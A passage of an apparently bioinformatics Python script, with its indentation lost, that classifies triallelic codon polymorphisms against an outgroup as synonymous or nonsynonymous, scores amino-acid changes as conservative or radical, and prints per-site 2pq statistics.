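# Three asexual alleles: same pairwise-difference parsimony logic as in the
# sexual section above.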
ab = 0
ac = 0
bc = 0
codonA = currAlleleList[0]
codonB = currAlleleList[1]
codonC = currAlleleList[2]
if codonA[0] != codonB[0]:
ab += 1
if codonA[1] != codonB[1]:
ab += 1
if codonA[2] != codonB[2]:
ab += 1
if codonA[0] != codonC[0]:
ac += 1
if codonA[1] != codonC[1]:
ac += 1
if codonA[2] != codonC[2]:
ac += 1
if codonC[0] != codonB[0]:
bc += 1
if codonC[1] != codonB[1]:
bc += 1
if codonC[2] != codonB[2]:
bc += 1
if ab == ac and ac == bc:
if 'N' not in outCodon and '-' not in outCodon:
if outCodon == codonA:
aaList1 = [currAADict[codonA],currAADict[codonB]]
aaList2 = [currAADict[codonA],currAADict[codonC]]
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
asex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
asex_sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_S += twoPQ1
asex_sum2PQ_N += twoPQ2
asex_synS += 1
asex_nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
asex_nsynS += 1
asex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
asex_sum2PQ_S += twoPQ2
asex_sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + ';' + aaList1[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
asex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + ';' + aaList1[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
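# Outgroup codon matches allele B: treat codonB as ancestral and score the two derived changes (to codonA and to codonC).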
elif outCodon == codonB:
aaList1 = [currAADict[codonB],currAADict[codonA]]
aaList2 = [currAADict[codonB],currAADict[codonC]]
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
asex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
asex_sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_S += twoPQ1
asex_sum2PQ_N += twoPQ2
asex_synS += 1
asex_nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
asex_nsynS += 1
asex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
asex_sum2PQ_S += twoPQ2
asex_sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + ';' + aaList1[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
asex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + ';' + aaList1[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
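# Outgroup codon matches allele C: treat codonC as ancestral and score the derived changes to codonA and codonB.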
elif outCodon == codonC:
aaList1 = [currAADict[codonC],currAADict[codonA]]
aaList2 = [currAADict[codonC],currAADict[codonB]]
codonList1 = [codonC,codonA]
codonList2 = [codonC,codonB]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
asex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
asex_sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_S += twoPQ1
asex_sum2PQ_N += twoPQ2
asex_synS += 1
asex_nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
asex_nsynS += 1
asex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
asex_sum2PQ_S += twoPQ2
asex_sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + ';' + aaList1[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
asex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + ';' + aaList1[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
